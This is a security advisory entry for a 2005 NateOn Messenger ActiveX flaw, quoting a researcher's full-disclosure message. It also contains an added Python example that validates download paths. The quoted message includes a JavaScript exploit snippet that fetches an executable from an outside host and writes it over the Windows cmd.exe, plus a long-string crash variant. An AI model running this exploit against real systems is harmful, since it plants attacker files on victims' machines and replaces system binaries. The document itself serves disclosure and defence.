NateOn Messenger Buffer Overflow in 'NateonDownloadManager.ocx' Lets Remote Users Upload Files and Also Deny Service
SecurityTracker Alert ID: 1014987
SecurityTracker URL: http://securitytracker.com/id?1014987
CVE Reference: CVE-2005-3113, CVE-2005-3114
Updated: Jun 15 2008
Original Entry Date: Sep 29 2005
Impact: Denial of service via network, Modification of system information, Modification of user information, User access via network
Exploit Included: Yes
Description: A vulnerability was reported in NateOn Messenger. A remote user can cause denial of service conditions. A remote user can upload files to the target user's system.

A remote user can create specially crafted HTML that, when loaded by the target user, will trigger a buffer overflow in the 'NateonDownloadManager.ocx' ActiveX component, causing the target user's application to crash. Because the same component's download method accepts a caller-supplied URL and local destination path (see the reporter's snippet below), a remote user can also cause arbitrary files to be downloaded to arbitrary locations on the target user's system.

The vendor was notified on September 17, 2005. GYU TAE PARK discovered this vulnerability.

Impact: A remote user can cause the target user's application to crash. A remote user can also download arbitrary files to arbitrary locations on the target user's system.

Solution: No solution was available at the time of this entry.

Vendor URL: nateonweb.nate.com/

Cause: Access control error, Boundary error

Underlying OS: Windows (Any)

Reported By: "saintlinu" <saintlinu@yahoo.co.kr>

Message History: None.
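As an added illustration, not NateOn's code and not part of the advisory, the following Python shows the two checks whose absence the entry attributes to the control: the destination is confined to a fixed download directory instead of being caller-chosen (the access control error), and its length is bounded before the string is used (the boundary error). The download root, the length limit, and the example URL are assumed values.

```python
import os
from urllib.parse import urlsplit

# Assumed policy values, not taken from the advisory: a fixed download root and
# a length bound sized like a fixed MAX_PATH-style path buffer.
DOWNLOAD_ROOT = os.path.realpath("downloads")
MAX_DEST_LEN = 260


class DownloadRejected(ValueError):
    """Request refused before any copy into a bounded buffer or any write."""


def validate_download(url: str, dest_name: str) -> str:
    """Return the absolute path a download may be written to, or raise.

    The advisory's control accepted any destination path and any length;
    both are checked here before the request is acted on.
    """
    # Boundary check first, before the string is copied or joined anywhere.
    if not dest_name or len(dest_name) > MAX_DEST_LEN or "\x00" in dest_name:
        raise DownloadRejected("destination name length or content invalid")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise DownloadRejected("unsupported download URL")
    # Access control: the caller supplies a bare file name, never a path.
    if os.path.isabs(dest_name) or ":" in dest_name:
        raise DownloadRejected("absolute or drive-qualified destination")
    if "/" in dest_name or "\\" in dest_name or dest_name.startswith("."):
        raise DownloadRejected("path separators or dot names not allowed")
    # Canonicalize and confirm the final location still lies under the root.
    final = os.path.realpath(os.path.join(DOWNLOAD_ROOT, dest_name))
    if os.path.commonpath([DOWNLOAD_ROOT, final]) != DOWNLOAD_ROOT:
        raise DownloadRejected("destination escapes download root")
    return final


def is_accepted(url: str, dest_name: str) -> bool:
    """True if validate_download would allow the request."""
    try:
        validate_download(url, dest_name)
        return True
    except DownloadRejected:
        return False


if __name__ == "__main__":
    # Constructed inputs mirroring the argument shapes in the advisory's snippet.
    url = "http://example.invalid/gotit.exe"  # placeholder host, not the advisory's
    for dest in ("gotit.exe", "c:\\windows\\system32\\cmd.exe", "A" * 5000, "..\\..\\x"):
        print(repr(dest[:40]), "accepted" if is_accepted(url, dest) else "rejected")
```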
Source Message Contents
Date: Thu, 29 Sep 2005 11:36:27 +0800
From: "saintlinu" <saintlinu@yahoo.co.kr>
Subject: [Full-disclosure] [NRVA05-08] - Arbitrary file download by NateOn
Title: Arbitrary File Download by NateOn Messenger's ActiveX and DoS
Discoverer: PARK, GYU TAE (saintlinu@null2root.org)
Advisory No.: NRVA05-08
Critical: Moderately Critical
Impact: Arbitrary file download by NateOn Messenger's ActiveX and DoS
Where: From remote
Operating System: Windows Only
Solution: Unpatched yet
Workaround: N / A
Notice: 09. 17. 2005 Initial notification
        09. 23. 2005 2nd notification
        09. 27. 2005 3rd notification
        09. 29. 2005 Vendor didn't respond. Disclosure of vulnerability

Description:
The NateOn Messenger (see NRVA05-02) is an Internet instant messenger such as MSN, YAHOO and so on.
If NateOn Messenger is installed, then it can be exploited via the 'NateonDownloadManager.ocx' ActiveX control,
and there is another vulnerability like a buffer overflow.
See the following detailed description:
NOT INCLUDED HERE BUT A PIECE OF CODE
<--snip-->
// GotNate: the ActiveX control object; its instantiation is not included in the snippet
i = GotNate.IsNateonInstall();
if( i == 1 ) {
    alert('NateOn Messenger already installed. Do Attack ...');
    // if you want to second order attack then try
    i = GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\system32\\cmd.exe');
    // if you want to crash to victim system then try
    i = GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_strings_in_here');
} else {
    alert('NateOn Messenger NOT Installed');
}
</--snip-->
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/